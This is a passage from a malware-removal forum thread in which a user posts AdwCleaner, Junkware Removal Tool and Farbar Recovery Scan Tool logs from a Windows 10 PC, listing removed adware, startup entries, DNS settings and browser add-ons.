[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9D51D472-88C3-4E12-93EA-8AEAFC57B227}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B12E159D-74BA-45B7-AE12-F6D1A71F9E50}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B4685AA8-DBDD-4D8E-9A16-51B64646026A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{BB925FE4-7161-454F-88EE-7F58C40F549C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{BE1EDE40-9C0B-4913-BF21-09F7AB5E270E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{CA95AC1F-EBBD-4B84-AA2D-5383D029E534}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{FCCC0AFD-B6BD-40A4-8A01-2A4B934C0546}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2238806b-78fe-443b-84c0-3c3d7647b8b8}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5bb649a4-1c05-4e18-b7a0-80a0fd29d8d7}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{131a1f72-5c50-43cf-ba3e-3ac75df1188b}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{004F2608-3092-40C2-B880-1FD74DDA6B9A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0CD246B5-EC5A-4601-9A8F-C6D21742BB86}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{15F335C1-5CC0-4786-ABB9-06E727FF2D42}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1B4CF49B-8B69-4A90-8B51-D2088E1EC1BA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1B749406-A17C-4A1C-9E87-E1E94A0C1A52}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1BCF3F83-F9A0-4075-B0BC-53128BBC228F}
[#] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{23905799-4E4E-457F-8EEA-88A514D38DCA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2EEF77F9-4F97-4158-9209-A95B38C38EC1}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4025F9A4-91CE-4F20-8486-8A3D95564DB3}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{41040243-9338-4C91-9457-AD11F56F48E1}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4B6F98D4-3D4D-4D72-A89B-7B75207AF16D}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E60D532-F00E-495B-BD0F-75F1B96CC714}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{5128A486-0AED-4F8D-B1C0-1E0FF64CD1D0}
[-] Key Deleted : HKCU\Software\dsiteproducts
[-] Key Deleted : HKCU\Software\InstallCore
[-] Key Deleted : HKCU\Software\mysearchdial.com
[-] Key Deleted : HKCU\Software\Softonic
[-] Key Deleted : HKCU\Software\Tutorials
[-] Key Deleted : HKCU\Software\TutoTag
[-] Key Deleted : HKCU\Software\CouponXplorer_5z
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key Deleted : HKCU\Software\AppDataLow\Software\CouponXplorer_5z
[-] Key Deleted : HKLM\SOFTWARE\DESKTOPPLAY
[-] Key Deleted : HKLM\SOFTWARE\InstallIQ
[-] Key Deleted : HKLM\SOFTWARE\Tutorials
[-] Key Deleted : HKLM\SOFTWARE\CouponXplorer_5z
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{5ED3F37F-AD3B-44DF-AA5A-C1B51FDBDF51}
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282} [NameServer]

***** [ Web browsers ] *****

[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.historyixquick", "[]");
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.home", "startpage");
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.hxxps", true);
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.query", "");
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("keyword.URL", "hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=282369&p=");
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Default_Search_Provider_Data] Deleted : hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : bopakagnckmlgajfccecajhnimjiiedh

*************************

:: "Tracing" keys removed
:: Proxy settings cleared
:: Winsock settings cleared
:: TCP/IP settings cleared
:: Firewall settings cleared
:: IPSec settings cleared
:: BITS queue cleared
:: IE policies deleted
:: Chrome policies deleted

*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [14726 bytes] - [09/03/2016 17:33:35]
C:\Program Files (x86)\AdwCleaner\AdwCleaner[S1].txt - [13915 bytes] - [09/03/2016 17:31:39]

########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [14914 bytes] ##########

#8
LLL31

Posted 09 March 2016 - 05:51 PM

Member

Topic Starter
Member
15 posts

Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 10 Home x64
Ran by levilaing (Administrator) on Wed 03/09/2016 at 17:44:24.66
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File System: 12

Failed to delete: C:\WINDOWS\system32\drivers\bsdriver.sys (File)
Successfully deleted: C:\Users\levilaing\Appdata\LocalLow\company (Folder)
Successfully deleted: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\norton-safe-search.xml (File)
Successfully deleted: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\youtube-video-search.xml (File)
Successfully deleted: C:\WINDOWS\system32\drivers\cherimoya.sys (File)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARMANAGER_A6282D74-32661EF9.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARNOTIFIER.EXE-B25C45A8.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\VIDEOCONVERTERFREE.EXE-3DB3C933.pf (File)
Successfully repaired: C:\ProgramData\Microsoft\windows\Start Menu\Programs\Google Chrome.lnk (Shortcut)
Successfully repaired: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (Shortcut)
Successfully repaired: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk (Shortcut)
Successfully repaired: C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk (Shortcut)

Deleted the following from C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js
user_pref(extensions.ixquicktoolbar.home, ixquick);

Registry: 2

Successfully deleted: HKLM\Software\Google\Chrome\Extensions\chgdeabpmphfhkoemjjglmilajldekbp (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\\BrowserPlugInHelper (Registry Value)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 03/09/2016 at 17:47:26.50
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#9
LLL31

Posted 09 March 2016 - 05:57 PM

Member

Topic Starter
Member
15 posts

Here is the Fresh scan and Addition log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (09-03-2016 17:52:22)
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Windows\System32\valWBFPolicyService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2016-03-09]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
